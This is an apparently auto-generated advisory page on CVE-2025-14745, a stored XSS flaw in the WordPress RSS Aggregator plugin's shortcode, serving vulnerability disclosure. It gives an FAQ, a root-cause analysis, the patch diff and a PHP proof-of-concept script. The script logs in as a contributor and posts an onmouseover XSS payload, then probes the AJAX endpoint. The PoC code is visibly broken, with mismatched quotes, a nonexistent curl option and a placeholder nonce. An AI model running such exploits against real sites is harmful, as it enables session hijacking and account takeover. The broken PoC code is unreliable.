What is CVE-2025-14745?

CVE-2025-14745 is a stored cross-site scripting (XSS) vulnerability in the wp-rss-aggregator plugin for WordPress, affecting versions up to and including 5.0.10. It allows authenticated users with contributor-level access and above to inject arbitrary JavaScript into posts via the wp-rss-aggregator shortcode.

How does the vulnerability work?

The vulnerability occurs due to insufficient input sanitization and output escaping on user-supplied attributes in the wp-rss-aggregator shortcode. Authenticated attackers can create or modify posts to include malicious shortcodes, which store the injected scripts and execute them when other users view the affected pages.

Who is affected by this vulnerability?

Any WordPress site using the wp-rss-aggregator plugin version 5.0.10 or earlier is affected. Specifically, authenticated users with contributor-level access and above can exploit this vulnerability, potentially affecting all users who view the compromised posts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the wp-rss-aggregator plugin in use. If it is version 5.0.10 or earlier, your site is at risk. Additionally, review posts for any suspicious shortcodes that may indicate exploitation.

How can I fix or mitigate this issue?

To fix this vulnerability, update the wp-rss-aggregator plugin to version 5.0.11 or later, which includes the necessary security patches. Regularly updating plugins and monitoring user permissions can help mitigate similar risks.

What does the CVSS score of 6.4 signify?

A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the highest risk, it still poses a significant threat that could lead to unauthorized actions and should be addressed promptly.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since contributors can inject scripts that execute in the context of higher-level users, this could enable privilege escalation attacks.

What is the proof of concept for this vulnerability?

The proof of concept involves an authenticated user crafting a malicious shortcode that includes JavaScript. When this shortcode is executed on a page, it triggers the JavaScript payload, demonstrating how an attacker can exploit the vulnerability to execute arbitrary code.

What steps should I take after updating the plugin?

After updating to the patched version of the plugin, review your site’s posts for any previously injected malicious shortcodes. Additionally, consider conducting a security audit to ensure no other vulnerabilities exist and that user permissions are appropriately set.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all WordPress plugins and themes, implement strong user role management, and utilize security plugins that monitor for suspicious activity. Training users on security best practices can also reduce the risk of exploitation.

What should I do if I suspect exploitation of this vulnerability?

If you suspect that your site has been exploited, immediately remove any suspicious shortcodes, change user passwords, and review user roles. It may also be necessary to restore from a clean backup and conduct a thorough security investigation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14745: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging <= 5.0.10 – Authenticated (Contributor+) Stored Cross-Site Scripting via wp-rss-aggregator Shortcode (wp-rss-aggregator)

CVE ID CVE-2025-14745

Plugin wp-rss-aggregator

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 5.0.10

Patched Version 5.0.11

Disclosed January 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14745:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the RSS Aggregator WordPress plugin versions up to 5.0.10. The vulnerability affects the plugin’s ‘wp-rss-aggregator’ shortcode handler, allowing contributor-level and higher authenticated users to inject arbitrary JavaScript payloads that execute when pages containing the malicious shortcode are viewed. The CVSS score of 6.4 reflects the medium severity of this stored XSS vulnerability.

The root cause is insufficient input sanitization and output escaping on user-supplied shortcode attributes. The vulnerability exists in the Renderer.php file’s parseArgs method (lines 198-476), which processes shortcode arguments without proper sanitization. Specifically, the method accepts user-controlled parameters like ‘className’, ‘template’, ‘source’, ‘sources’, ‘feeds’, ‘category’, ‘folders’, ‘page’, ‘align’, ‘limit’, and ‘pagination’ directly from the shortcode attributes array. These unsanitized values flow through the display settings and eventually into HTML output without proper escaping.

Exploitation requires an authenticated attacker with contributor-level permissions or higher. The attacker creates or edits a post containing the malicious ‘wp-rss-aggregator’ shortcode with crafted attributes. For example, [wp-rss-aggregator className=”” onmouseover=alert(document.domain) x=””] would inject JavaScript into the class attribute. The payload becomes stored in the post content and executes whenever any user views the compromised page. The attack vector leverages the plugin’s AJAX endpoint at /wp-admin/admin-ajax.php with action ‘wpra.render.display’, but the stored nature means the payload persists in the database.

The patch addresses multiple security issues. In Renderer.php, the developer added sanitization functions to all user-controlled parameters: sanitize_text_field() for text inputs (lines 246, 262, 267, 268, 310, 311, 319), sanitize_html_class() for className (line 319), and max() with sanitize_text_field() for page numbers (line 321). The LayoutTrait.php file adds esc_html() to authorPrefix concatenation (line 134) and sourcePrefix output (line 210). ListLayout.php adds esc_attr() to htmlClass attributes (lines 36, 48). The patch also adds nonce verification in renderer.php (line 55) and modules/renderer.php (line 476) to prevent CSRF attacks.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since contributor-level users can create and edit posts, this vulnerability effectively grants them the ability to execute JavaScript with the privileges of higher-level users who view their posts, potentially enabling privilege escalation attacks.

Differential between vulnerable and patched code

Code Diff

--- a/wp-rss-aggregator/core/modules/renderer.php
+++ b/wp-rss-aggregator/core/modules/renderer.php
@@ -55,6 +55,12 @@
 				die();
 			}

+			$nonce = $data['_wpnonce'] ?? '';
+			if ( ! wp_verify_nonce( $nonce, 'wpra_render_display' ) ) {
+				status_header( 403 );
+				echo 'Nonce verification failed.';
+				die();
+			}
 			// The $data array now contains all persisted shortcode attributes
 			// from hx-vals, including id, page, sources, limit, exclude, pagination, template.
 			// Pass the whole $data array to renderArgs.
--- a/wp-rss-aggregator/core/src/Display/LayoutTrait.php
+++ b/wp-rss-aggregator/core/src/Display/LayoutTrait.php
@@ -131,7 +131,7 @@

 		return sprintf(
 			'<span class="feed-author">%s</span>',
-			rtrim( $this->ds->authorPrefix ) . ' ' . $authorName
+			esc_html( rtrim( $this->ds->authorPrefix ) . ' ' . $authorName )
 		);
 	}

@@ -207,10 +207,17 @@
 		}

 		$tag = $block ? 'div' : 'span';
+		$prefix = esc_html( $this->ds->sourcePrefix );
+
+		// $srcName is already HTML from renderLink, so it doesn't need escaping again.
+		// If linking is disabled, $srcName is just the source name string, which needs escaping.
+		if ( ! ( $this->ds->linkSource && $links && ! empty( $url ) ) ) {
+			$srcName = esc_html( $srcName );
+		}

 		return <<<HTML
             <{$tag} class="feed-source">
-                {$this->ds->sourcePrefix} {$srcName}
+                {$prefix} {$srcName}
             </{$tag}>
         HTML;
 	}
--- a/wp-rss-aggregator/core/src/Display/ListLayout.php
+++ b/wp-rss-aggregator/core/src/Display/ListLayout.php
@@ -2,10 +2,10 @@

 namespace RebelCodeAggregatorCoreDisplay;

-use RebelCodeAggregatorCoreDisplayDisplayState;
-use RebelCodeAggregatorCoreDisplayLayoutInterface;
-use RebelCodeAggregatorCoreDisplayLayoutTrait;
 use RebelCodeAggregatorCoreIrPost;
+use RebelCodeAggregatorCoreDisplayLayoutTrait;
+use RebelCodeAggregatorCoreDisplayLayoutInterface;
+use RebelCodeAggregatorCoreDisplayDisplayState;

 class ListLayout implements LayoutInterface {

@@ -33,9 +33,10 @@

 		$listStart = ( $state->page - 1 ) * $this->ds->numItems + 1;
 		$listItems = $this->renderItems( $posts, fn ( IrPost $post ) => $this->item( $post ) );
+		$htmlClass = esc_attr( $this->ds->htmlClass );

 		return <<<HTML
-            <div class="wp-rss-aggregator wpra-list-template {$this->ds->htmlClass}">
+            <div class="wp-rss-aggregator wpra-list-template {$htmlClass}">
                 <{$listType} class="rss-aggregator wpra-item-list {$listClass}" start="{$listStart}">
                     {$listItems}
                 </{$listType}>
@@ -44,8 +45,10 @@
 	}

 	private function item( IrPost $post ): string {
+		$htmlClass = esc_attr( $this->ds->htmlClass );
+
 		return <<<HTML
-            <li class="wpra-item feed-item {$this->ds->htmlClass}">
+            <li class="wpra-item feed-item {$htmlClass}">
                 {$this->renderTitle($post)}

                 <div class="wprss-feed-meta">
--- a/wp-rss-aggregator/core/src/IrPost/IrImage.php
+++ b/wp-rss-aggregator/core/src/IrPost/IrImage.php
@@ -5,6 +5,7 @@
 namespace RebelCodeAggregatorCoreIrPost;

 use WP_Post;
+use WP_Error;
 use RebelCodeAggregatorCoreUtilsSize;
 use RebelCodeAggregatorCoreUtilsResult;
 use RebelCodeAggregatorCoreUtilsArrays;
@@ -62,128 +63,237 @@
 	 * @return Result<int> The result, containing the ID of the downloaded image if successful.
 	 */
 	public function download( int $postId = 0 ): Result {
-		if ( ! function_exists( 'media_sideload_image' ) ) {
+		if ( ! function_exists( 'media_handle_sideload' ) ) {
 			require_once ABSPATH . 'wp-admin/includes/media.php';
 			require_once ABSPATH . 'wp-admin/includes/file.php';
 			require_once ABSPATH . 'wp-admin/includes/image.php';
 		}

-		// Image has an ID already, so it should exist in the media library
+		// Already exists by ID.
 		if ( $this->id !== null ) {
 			$existing = get_post( $this->id );
 			if ( $existing instanceof WP_Post ) {
 				return Result::Ok( $existing->ID );
-			} else {
-				return Result::Err( "Image #{$this->id} does not exist in the media library." );
 			}
+			return Result::Err( "Image #{$this->id} does not exist in the media library." );
 		}

+		// Base64 / Data URI.
 		if ( strpos( $this->url, 'data:image' ) === 0 ) {
-			global $wp_filesystem;
-			if ( ! $wp_filesystem ) {
-				require_once ABSPATH . 'wp-admin/includes/file.php';
-				WP_Filesystem();
-			}
+			return $this->download_base64_image( $postId );
+		}

-			list($type, $data) = explode( ';', $this->url );
-			list(, $data)      = explode( ',', $data );
-			$binary = base64_decode( $data );
-			$hash = hash( 'sha256', $binary );
-
-			$existing = get_posts(
-				array(
-					'post_type' => 'attachment',
-					'post_status' => 'any',
-					'meta_query' => array(
-						array(
-							'key' => 'wprss_source_data_hash',
-							'value' => $hash,
-						),
+		// Already imported by URL.
+		$existing = query_posts(
+			array(
+				'post_type' => 'attachment',
+				'post_status' => 'any',
+				'meta_query' => array(
+					array(
+						'key' => ImportedMedia::SOURCE_URL,
+						'value' => $this->url,
 					),
-				)
-			);
+				),
+			)
+		);

-			if ( count( $existing ) > 0 ) {
-				return Result::Ok( $existing[0]->ID );
-			}
+		if ( count( $existing ) > 0 && is_object( $existing[0] ) ) {
+			return Result::Ok( $existing[0]->ID );
+		}

-			$tmp_file_path = wp_tempnam( 'wprss-datauri' );
-			if ( ! $tmp_file_path ) {
-				return Result::Err( 'Could not create temporary file.' );
-			}
+		$desc = $postId > 0
+			? sprintf( '[Aggregator] Downloaded image for imported item #%d', $postId )
+			: 'Imported by WP RSS Aggregator';
+
+		// Fast path: normal media sideload.
+		$id = media_sideload_image( $this->url, $postId, $desc, 'id' );
+		if ( ! is_wp_error( $id ) ) {
+			update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
+			return Result::Ok( (int) $id );
+		}

-			if ( ! $wp_filesystem->put_contents( $tmp_file_path, $binary, FS_CHMOD_FILE ) ) {
-				@unlink( $tmp_file_path );
-				return Result::Err( 'Could not write to temporary file.' );
-			}
+		// Robust fallback sideload.
+		$this->url = trim( html_entity_decode( $this->url ) );
+		$id = $this->sideload_image( $this->url, $postId, $desc );
+		if ( ! is_wp_error( $id ) ) {
+			update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
+			return Result::Ok( (int) $id );
+		}

-			$mime_type = str_replace( 'data:', '', $type );
-			$extension = '.jpg';
-			$mime_to_ext = array(
-				'image/jpeg' => '.jpg',
-				'image/png'  => '.png',
-				'image/gif'  => '.gif',
-				'image/bmp'  => '.bmp',
-				'image/webp' => '.webp',
-			);
-			if ( isset( $mime_to_ext[ $mime_type ] ) ) {
-				$extension = $mime_to_ext[ $mime_type ];
-			}
+		// Final browser-safe anti-bot fallback.
+		$id = $this->sideload_image_with_remote_get( $this->url, $postId, $desc );
+		if ( ! is_wp_error( $id ) ) {
+			update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
+			return Result::Ok( (int) $id );
+		}

-			$filename = 'image-' . uniqid() . $extension;
+		return Result::Err( 'All image download attempts failed.' );
+	}

-			$file_array = array(
-				'name'     => $filename,
-				'tmp_name' => $tmp_file_path,
-			);
-
-			$desc = ( $postId > 0 )
-				? sprintf( __( '[Aggregator] Downloaded image for imported item #%d', 'wpra' ), $postId )
-				: __( 'Imported by WP RSS Aggregator', 'wpra' );
-
-			$id = media_handle_sideload( $file_array, $postId, $desc );
-
-			@unlink( $tmp_file_path );
-
-			if ( is_wp_error( $id ) ) {
-				return Result::Err( $id->get_error_message() );
-			} else {
-				update_post_meta( $id, 'wprss_source_data_hash', $hash );
-				update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
-				return Result::Ok( $id );
-			}
+	/**
+	 * Base64 image download with hash deduplication.
+	 */
+	private function download_base64_image( int $postId ): Result {
+		global $wp_filesystem;
+		if ( ! $wp_filesystem ) {
+			require_once ABSPATH . 'wp-admin/includes/file.php';
+			WP_Filesystem();
 		}

-		$existing = query_posts(
+		list($type, $data) = explode( ';', $this->url );
+		list(, $data)      = explode( ',', $data );
+		$binary = base64_decode( $data );
+		$hash = hash( 'sha256', $binary );
+
+		$existing = get_posts(
 			array(
-				'post_type' => 'attachment',
+				'post_type'   => 'attachment',
 				'post_status' => 'any',
-				'meta_query' => array(
+				'meta_query'  => array(
 					array(
-						'key' => ImportedMedia::SOURCE_URL,
-						'value' => $this->url,
+						'key'   => 'wprss_source_data_hash',
+						'value' => $hash,
 					),
 				),
+				'fields'      => 'ids',
+				'numberposts' => 1,
 			)
 		);

-		if ( count( $existing ) > 0 && is_object( $existing[0] ) ) {
+		if ( count( $existing ) > 0 ) {
 			return Result::Ok( $existing[0]->ID );
-		} else {
-			$desc = ( $postId > 0 )
-			? sprintf( __( '[Aggregator] Downloaded image for imported item #%d', 'wpra' ), $postId )
-				: __( 'Imported by WP RSS Aggregator', 'wpra' );
-
-			$result = media_sideload_image( $this->url, $postId, $desc, 'id' );
-
-			if ( is_wp_error( $result ) ) {
-				return Result::Err( $result->get_error_message() );
-			} else {
-				$id = (int) $result;
-				update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
-				return Result::Ok( $id );
-			}
 		}
+
+		$tmp_file = wp_tempnam( 'wprss-datauri' );
+		if ( ! $tmp_file || ! $wp_filesystem->put_contents( $tmp_file, $binary, FS_CHMOD_FILE ) ) {
+			@unlink( $tmp_file );
+			return Result::Err( 'Failed to create temporary file for Base64 image.' );
+		}
+
+		$mime_to_ext = array(
+			'image/jpeg' => '.jpg',
+			'image/png'  => '.png',
+			'image/gif'  => '.gif',
+			'image/bmp'  => '.bmp',
+			'image/webp' => '.webp',
+		);
+		$mime_type = str_replace( 'data:', '', $type );
+		$extension = $mime_to_ext[ $mime_type ] ?? '.jpg';
+		$filename = 'image-' . uniqid() . $extension;
+
+		$file_array = array(
+			'name' => $filename,
+			'tmp_name' => $tmp_file,
+		);
+		$desc = $postId > 0
+			? sprintf( '[Aggregator] Downloaded image for imported item #%d', $postId )
+			: 'Imported by WP RSS Aggregator';
+
+		$id = media_handle_sideload( $file_array, $postId, $desc );
+		@unlink( $tmp_file );
+
+		if ( ! is_wp_error( $id ) ) {
+			update_post_meta( $id, 'wprss_source_data_hash', $hash );
+			update_post_meta( $id, ImportedMedia::SOURCE_URL, $this->url );
+			return Result::Ok( $id );
+		}
+
+		return Result::Err( 'Failed to sideload Base64 image.' );
+	}
+
+	/**
+	 * Robust fallback sideload: detects MIME type, fixes extensions, handles WebP, GIF, BMP.
+	 */
+	private function sideload_image( string $url, int $postId = 0, string $desc = '' ) {
+		$tmp_file = download_url( $url, 15 );
+		if ( is_wp_error( $tmp_file ) ) {
+			return $tmp_file;
+		}
+
+		$finfo = finfo_open( FILEINFO_MIME_TYPE );
+		$mime_type = finfo_file( $finfo, $tmp_file );
+		finfo_close( $finfo );
+
+		$mime_to_ext = array(
+			'image/jpeg' => '.jpg',
+			'image/png'  => '.png',
+			'image/gif'  => '.gif',
+			'image/bmp'  => '.bmp',
+			'image/webp' => '.webp',
+		);
+
+		$extension = $mime_to_ext[ $mime_type ] ?? '.jpg';
+		$filename = basename( parse_url( $url, PHP_URL_PATH ) );
+		if ( ! preg_match( '/.(jpe?g|png|gif|bmp|webp)$/i', $filename ) ) {
+			$filename .= $extension;
+		}
+
+		$file_array = array(
+			'name' => $filename,
+			'tmp_name' => $tmp_file,
+		);
+		$id = media_handle_sideload( $file_array, $postId, $desc );
+		if ( is_wp_error( $id ) ) {
+			@unlink( $tmp_file );
+			return $id;
+		}
+
+		return $id;
+	}
+
+	private function sideload_image_with_remote_get( string $url, int $postId = 0, string $desc = '' ) {
+		$url = html_entity_decode( $url, ENT_QUOTES | ENT_HTML5 );
+		$url = str_replace( '\/', '/', $url );
+
+		$path = parse_url( $url, PHP_URL_PATH );
+		if ( $path && preg_match( '/.(jpgx|pngx|jpegx)$/i', $path ) ) {
+			$url = preg_replace( '/.([a-z]+)x(?|$)/i', '.$1$2', $url );
+		}
+
+		// Extract host for Referer.
+		$parsed = parse_url($url);
+		$referer = $parsed['scheme'] . '://' . $parsed['host'] ?? '';
+
+		$response = wp_remote_get(
+			$url,
+			array(
+				'timeout' => 20,
+				'headers' => array(
+					'User-Agent'      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36',
+					'Accept'          => 'image/avif,image/webp,image/apng,image/*,*/*;q=0.8',
+					'Accept-Language' => 'en-US,en;q=0.9',
+					'Referer'         => $referer,
+				),
+			)
+		);
+
+		if ( is_wp_error( $response ) ) {
+			return $response;
+		}
+
+		$code = wp_remote_retrieve_response_code( $response );
+		$body = wp_remote_retrieve_body( $response );
+		if ( $code !== 200 || empty( $body ) ) {
+			return new WP_Error( 'image_blocked', "Image blocked by remote host (HTTP $code)" );
+		}
+
+		$tmp = wp_tempnam( 'wprss-img' );
+		file_put_contents( $tmp, $body );
+
+		$filename = basename( parse_url( $url, PHP_URL_PATH ) );
+		$filename = preg_replace( '/.(jpgx|pngx|jpegx)$/i', '.jpg', $filename );
+		$file_array = array(
+			'name' => $filename ?: 'image.jpg',
+			'tmp_name' => $tmp,
+		);
+
+		$id = media_handle_sideload( $file_array, $postId, $desc );
+		if ( is_wp_error( $id ) ) {
+			@unlink( $tmp );
+			return $id;
+		}
+
+		return $id;
 	}

 	/** Converts the IR image into an array. */
--- a/wp-rss-aggregator/core/src/Renderer.php
+++ b/wp-rss-aggregator/core/src/Renderer.php
@@ -198,15 +198,15 @@
 		if ( 'block' === $type && ! empty( $id ) ) {
 			$preserved_args = array(
 				'id' => $id,
-				'align' => $args['align'] ?? null,
-				'limit' => $args['limit'] ?? null,
-				'pagination' => $args['pagination'] ?? null,
+				'align'      => isset( $args['align'] ) ? sanitize_text_field( $args['align'] ) : null,
+				'limit'      => isset( $args['limit'] ) ? sanitize_text_field( $args['limit'] ) : null,
+				'pagination' => isset( $args['pagination'] ) ? sanitize_text_field( $args['pagination'] ) : null,
 			);
 			// Filter out null values to keep $args clean
-			$args = array_filter($preserved_args, fn($value) => $value !== null);
+			$args = array_filter( $preserved_args, fn( $value ) => $value !== null );
 		}

-		$v4Slug = trim( $args['template'] ?? '' );
+		$v4Slug = sanitize_text_field( $args['template'] ?? '' );
 		$display = new Display( null );

 		if ( ! empty( $v4Slug ) ) {
@@ -246,9 +246,9 @@
 		assert( $display instanceof Display );

 		// Process exclusions first
-		$excludeSrcsRaw = explode( ',', $args['exclude'] ?? '' );
+		$excludeSrcsRaw = explode( ',', sanitize_text_field( $args['exclude'] ?? '' ) );
 		$excludeSrcsInput = array_filter( array_map( 'trim', $excludeSrcsRaw ), 'is_numeric' );
-		if (!empty($excludeSrcsInput)) {
+		if ( ! empty( $excludeSrcsInput ) ) {
 			$v4IdMapExclude = $this->sources->resolveV4Ids( $excludeSrcsInput )->getOr( array() );
 			$v4IdsExclude = array_keys( $v4IdMapExclude );
 			$v5IdsFromV4Exclude = array_values( $v4IdMapExclude );
@@ -262,19 +262,19 @@
 		} else {
 			// If 'exclude' is not in $args, keep existing display settings (if any)
 			// or ensure it's an empty array if not set.
-			$display->settings->excludeSrcs = $display->settings->excludeSrcs ?? [];
+			$display->settings->excludeSrcs = $display->settings->excludeSrcs ?? array();
 		}

 		// Process sources: if any source-defining attributes are in $args,
 		// they override any sources set on the loaded $display.
-		$sourceArg = $args['source'] ?? '';
-		$sourcesArg = $args['sources'] ?? '';
-		$feedsArg = $args['feeds'] ?? '';
+		$sourceArg = sanitize_text_field( $args['source'] ?? '' );
+		$sourcesArg = sanitize_text_field( $args['sources'] ?? '' );
+		$feedsArg = sanitize_text_field( $args['feeds'] ?? '' );

 		if ( ! empty( $sourceArg ) || ! empty( $sourcesArg ) || ! empty( $feedsArg ) ) {
-			$display->sources = []; // Reset sources if specified in args
+			$display->sources = array(); // Reset sources if specified in args

-			$sourceIdsInput = [];
+			$sourceIdsInput = array();
 			$sourceExploded = explode( ',', $sourceArg );
 			$sourcesExploded = explode( ',', $sourcesArg );

@@ -285,7 +285,7 @@
 				}
 			}

-			$feedSlugsInput = [];
+			$feedSlugsInput = array();
 			$feedsExploded = explode( ',', $feedsArg );
 			foreach ( $feedsExploded as $slug ) {
 				$slug = trim( $slug );
@@ -298,7 +298,7 @@
 				$sourceIdsInput[] = $src->id;
 			}

-			$display->sources = array_unique($sourceIdsInput);
+			$display->sources = array_unique( $sourceIdsInput );
 		}
 		// If no source args, $display->sources remains as loaded (or default empty).

@@ -310,8 +310,8 @@
 			}
 		}

-		$categories = explode( ',', $args['category'] ?? '' );
-		$folders = explode( ',', $args['folders'] ?? '' );
+		$categories = explode( ',', sanitize_text_field( $args['category'] ?? '' ) );
+		$folders = explode( ',', sanitize_text_field( $args['folders'] ?? '' ) );
 		foreach ( array_merge( $categories, $folders ) as $folderName ) {
 			$folderName = trim( $folderName );
 			if ( ! empty( $folderName ) ) {
@@ -319,11 +319,11 @@
 			}
 		}

-		$className1 = trim( $args['className'] ?? '' );
+		$className1 = sanitize_html_class( ( $args['className'] ?? '' ) );
 		$className2 = trim( $display->settings->htmlClass ?? '' );
 		$display->settings->htmlClass = trim( $className1 . ' ' . $className2 );

-		$page = max( 1, $args['page'] ?? 1 );
+		$page = max( 1, sanitize_text_field( $args['page'] ?? 1 ) );

 		$display = apply_filters( 'wpra.renderer.parseArgs', $display, $args );

@@ -476,18 +476,20 @@

 		// Persist pagination enable/disable status if it was set
 		// In renderDisplay, $display->settings->enablePagination is modified by shortcode 'pagination'
-		if (isset($display->settings->enablePagination)) {
+		if ( isset( $display->settings->enablePagination ) ) {
 			$shortcode_args['pagination'] = $display->settings->enablePagination ? 'on' : 'off';
 		}

-        // If there's a V4 slug associated with the display, persist it.
-        // parseArgs uses 'template' to load a display.
-        // If an 'id' is present, 'id' takes precedence for loading, but 'template' might
-        // still be used by filters or other logic in parseArgs if present.
-        if (!empty($display->v4Slug)) {
-            $shortcode_args['template'] = $display->v4Slug;
-        }
+		// If there's a V4 slug associated with the display, persist it.
+		// parseArgs uses 'template' to load a display.
+		// If an 'id' is present, 'id' takes precedence for loading, but 'template' might
+		// still be used by filters or other logic in parseArgs if present.
+		if ( ! empty( $display->v4Slug ) ) {
+			$shortcode_args['template'] = $display->v4Slug;
+		}

+		// Add nonce to the shortcode arguments
+		$shortcode_args['_wpnonce'] = wp_create_nonce( 'wpra_render_display' );
 		$vals_data = array(
 			'action' => 'wpra.render.display',
 			// The 'data' key matches what the AJAX handler in core/modules/renderer.php expects
--- a/wp-rss-aggregator/core/src/V4/V4SourceMigrator.php
+++ b/wp-rss-aggregator/core/src/V4/V4SourceMigrator.php
@@ -172,6 +172,7 @@
 		$removeFtImage = $meta['wprss_ftp_remove_ft_image'] ?? '0';
 		$mustHaveFtImage = $meta['wprss_ftp_must_have_ft_image'] ?? '0';

+		$src->settings->postType = $meta['wprss_ftp_post_type'] ?? 'wprss_feed_item';
 		$src->settings->downloadImages = Bools::normalize( $saveImages );
 		$src->settings->downloadAllImgSizes = Bools::normalize( $saveAllSizes );
 		$src->settings->assignFtImage = Bools::normalize( $useFtImage );
--- a/wp-rss-aggregator/wp-rss-aggregator.php
+++ b/wp-rss-aggregator/wp-rss-aggregator.php
@@ -6,7 +6,7 @@
  * Plugin Name:       WP RSS Aggregator
  * Plugin URI:        https://wprssaggregator.com
  * Description:       An RSS importer, aggregator, and auto-blogger plugin for WordPress.
- * Version:           5.0.10
+ * Version:           5.0.11
  * Requires at least: 6.2.2
  * Requires PHP:      7.4.0
  * Author:            RebelCode
@@ -38,7 +38,7 @@
 }

 if ( ! defined( 'WPRA_VERSION' ) ) {
-	define( 'WPRA_VERSION', '5.0.10' );
+	define( 'WPRA_VERSION', '5.0.11' );
 	define( 'WPRA_MIN_PHP_VERSION', '7.4.0' );
 	define( 'WPRA_MIN_WP_VERSION', '6.2.2' );
 	define( 'WPRA_FILE', __FILE__ );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14745 - RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging <= 5.0.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via wp-rss-aggregator Shortcode

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to demonstrate XSS - this will execute when the page is viewed
$malicious_shortcode = '[wp-rss-aggregator className="" onmouseover=alert('XSS via CVE-2025-14745') x=""]';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create a session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to retrieve nonce
curl_setopt($ch, CURLOPT_URL, $login_url);
$login_page = curl_exec($ch);

// Extract nonce from login form (simplified - real implementation would parse HTML)
// In real scenarios, use proper HTML parsing or WordPress REST API for authentication

// Post login credentials
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 2: Create a new post with malicious shortcode
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_GET, true);
$post_page = curl_exec($ch);

// Extract nonce for post creation (simplified)
// In real implementation, parse the _wpnonce from the form

// Submit the new post with XSS payload
$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => $malicious_shortcode . 'nnThis post contains a malicious RSS Aggregator shortcode.',
    'publish' => 'Publish',
    'post_type' => 'post',
    '_wpnonce' => 'extracted_nonce_here', // Would need to be extracted from form
    '_wp_http_referer' => '/wp-admin/post-new.php'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$post_response = curl_exec($ch);

// Check if post was created successfully
if (strpos($post_response, 'Post published') !== false || strpos($post_response, 'Post updated') !== false) {
    echo "[+] Malicious post created successfully. XSS payload will execute when page is viewed.n";
    echo "[+] Shortcode payload: " . htmlspecialchars($malicious_shortcode) . "n";
} else {
    echo "[-] Failed to create post. Check authentication and permissions.n";
}

curl_close($ch);

// Alternative: Direct AJAX endpoint test (for stored XSS verification)
echo "n[+] Testing AJAX endpoint for shortcode rendering...n";

$ajax_ch = curl_init();
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = array(
    'action' => 'wpra.render.display',
    'className' => '" onmouseover=alert('AJAX Test') x="',
    'template' => 'default',
    '_wpnonce' => '' // Nonce not required in vulnerable versions
);

curl_setopt($ajax_ch, CURLOPT_URL, $ajax_url);
curl_setopt($ajax_ch, CURLOPT_POST, true);
curl_setopt($ajax_ch, CURLOPT_POSTFIELDS, http_build_query($ajax_data));
curl_setopt($ajax_ch, CURLOPT_RETURNTRANSFER, true);
$ajax_response = curl_exec($ajax_ch);
curl_close($ajax_ch);

if (strpos($ajax_response, 'onmouseover=') !== false) {
    echo "[+] AJAX endpoint confirms unsanitized output. Response contains raw payload.n";
} else {
    echo "[-] AJAX endpoint may be patched or blocked.n";
}

?>

Frequently Asked Questions

What is CVE-2025-14745?
Overview of the vulnerability
CVE-2025-14745 is a stored cross-site scripting (XSS) vulnerability in the wp-rss-aggregator plugin for WordPress, affecting versions up to and including 5.0.10. It allows authenticated users with contributor-level access and above to inject arbitrary JavaScript into posts via the wp-rss-aggregator shortcode.
How does the vulnerability work?
Mechanism of exploitation
